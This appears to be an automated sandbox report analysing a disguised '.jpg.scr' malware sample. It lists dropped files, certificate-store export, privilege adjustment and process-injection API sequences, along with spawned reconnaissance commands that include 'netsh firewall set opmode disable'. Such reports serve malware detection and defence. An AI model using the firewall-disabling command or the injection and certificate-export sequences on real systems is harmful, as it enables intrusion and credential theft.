Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail edb00002.log
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail WindowsMail.pat
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\old *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\old unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Inbox *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Inbox unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Outbox *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Outbox unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Sent Items *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Sent Items unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Deleted Items *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Deleted Items unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Drafts *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Drafts unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Junk E-mail *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Junk E-mail unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Microsoft Communities *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Microsoft Communities unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new unknown

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Copy_of_Payment.jpg.scr	File created: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe
Source: C:\Program Files\Windows Mail\WinMail.exe	File created: C:\Users\admin\AppData\Local\Temp\ppcrlui_3580_2

May use bcdedit to modify the Windows boot settings

Show sources

Source: explorer.exe

Binary or memory string: c:\windows\system32\bcdedit.exe

Drops files with a non-matching file extension (content does not match file extension)

Show sources

Source: C:\Program Files\Windows Mail\WinMail.exe

File created: C:\Users\admin\AppData\Local\Temp\ppcrlui_3580_2

Uses ipconfig to modify the Windows network settings

Show sources

Source: unknown

Process created: C:\Windows\System32\ipconfig.exe

Data Obfuscation:

Binary may include packed or encrypted code

Show sources

Source: initial sample	Static PE information: section name: .text entropy: 7.0042224717
Source: initial sample	Static PE information: section name: .text entropy: 7.00421545309

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_0042EE7B LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

PE file contains an invalid checksum

Show sources

Source: Copy_of_Payment.jpg.scr	Static PE information: real checksum: 0x59e51 should be: 0x59e5c
Source: ubhiy.exe.3328.dr	Static PE information: real checksum: 0x59e51 should be: 0x614a1

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0040412D push es; iretd
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_004047F9 push cs; iretd
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0040412D push es; iretd
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_004047F9 push cs; iretd
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003C47F9 push cs; iretd
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003C412D push es; iretd
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0040412D push es; iretd
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_004047F9 push cs; iretd
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0021412D push es; iretd
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_002147F9 push cs; iretd
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0485412D push es; iretd
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_048547F9 push cs; iretd
Source: C:\Windows\explorer.exe	Code function: 8_2_029A412D push es; iretd
Source: C:\Windows\explorer.exe	Code function: 8_2_029A47F9 push cs; iretd
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A4412D push es; iretd
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A447F9 push cs; iretd
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0003412D push es; iretd
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_000347F9 push cs; iretd
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001A47F9 push cs; iretd
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001A412D push es; iretd
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0003412D push es; iretd
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_000347F9 push cs; iretd
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0003412D push es; iretd
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_000347F9 push cs; iretd
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0003412D push es; iretd
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_000347F9 push cs; iretd
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0014412D push es; iretd
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_001447F9 push cs; iretd

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0043376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_00433826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0043376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_00433826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003F3826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003F376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0043376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_00433826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_00243826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0024376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0488376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_04883826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\explorer.exe	Code function: 8_2_029D3826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\explorer.exe	Code function: 8_2_029D376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A73826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A7376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_00063826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0006376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001D3826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001D376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_00063826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0006376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_00063826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0006376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_00063826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0006376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_00173826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0017376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,

Contains functionality to query local drives

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_0042E93F GetModuleHandleW,GetProcAddress,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,

System Summary:

Reads internet explorer settings

Show sources

Source: C:\Program Files\Windows Mail\WinMail.exe

Key opened: HKEY_USERS\Software\Microsoft\Internet Explorer\Settings

Executable creates window controls seldom found in malware

Show sources

Source: C:\Program Files\Windows Mail\WinMail.exe

Window found: window name: SysTabControl32

Contains functionality to access the windows certificate store

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0041C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0041C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0041C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0041C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003DC0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003DC257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0041C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0041C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0022C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0022C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0486C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0486C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\explorer.exe	Code function: 8_2_029BC0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Windows\explorer.exe	Code function: 8_2_029BC257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A5C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A5C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0004C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0004C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001BC0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001BC257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0004C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0004C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0004C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0004C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0004C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0004C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0015C257 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0015C0E2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0042EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0042EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003EEB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0042EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0023EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0487EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\explorer.exe	Code function: 8_2_029CEB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A6EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0005EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001CEB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0005EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0005EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0005EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0016EB90 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

Contains functionality to enum processes or threads

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_00418601 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,Sleep,CloseHandle,Process32NextW,CloseHandle,DeleteFileW,MoveFileExW,

Contains functionality to instantiate COM classes

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_00434D64 CoCreateInstance,#8,#2,#9,

Creates files inside the user directory

Show sources

Source: C:\Copy_of_Payment.jpg.scr

File created: C:\Users\admin\AppData\Roaming\Sywayc

Creates temporary files

Show sources

Source: C:\Copy_of_Payment.jpg.scr

File created: C:\Users\admin\AppData\Local\Temp\tmpcdb5e370.bat

Executable uses VB runtime library 6.0 (Probably coded in Visual Basic)

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Section loaded: C:\Windows\System32\msvbvm60.dll

Executes batch files

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\tmpcdb5e370.bat

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe

Console Write: ........l#..........T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d...........-........w..-.B...`.....,.....

PE file has an executable .text section and no other executable section

Show sources

Source: Copy_of_Payment.jpg.scr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads ini files

Show sources

Source: C:\Program Files\Windows Mail\WinMail.exe

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Copy_of_Payment.jpg.scr
Source: unknown	Process created: C:\Copy_of_Payment.jpg.scr
Source: unknown	Process created: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe
Source: unknown	Process created: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Program Files\Windows Mail\WinMail.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Windows\System32\HOSTNAME.EXE
Source: unknown	Process created: C:\Windows\System32\tasklist.exe
Source: unknown	Process created: C:\Windows\System32\ipconfig.exe
Source: unknown	Process created: C:\Windows\System32\netsh.exe
Source: C:\Copy_of_Payment.jpg.scr	Process created: C:\Copy_of_Payment.jpg.scr C:\Copy_of_Payment.jpg.scr /S
Source: C:\Copy_of_Payment.jpg.scr	Process created: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe
Source: C:\Copy_of_Payment.jpg.scr	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\tmpcdb5e370.bat
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process created: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall set opmode disable

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\dwm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Uses tasklist.exe to query information about running processes

Show sources

Source: unknown

Process created: C:\Windows\System32\tasklist.exe

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Show sources

Source: Copy_of_Payment.jpg.scr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ubhiy.exe.3328.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Contains functionality to call native functions

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0040C467 GetCurrentProcess,WriteProcessMemory,NtCreateThread,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0040B826 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0040B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0040C467 GetCurrentProcess,WriteProcessMemory,NtCreateThread,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0040B826 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0040B770 NtQueryInformationProcess,CloseHandle,NtCreateThread,
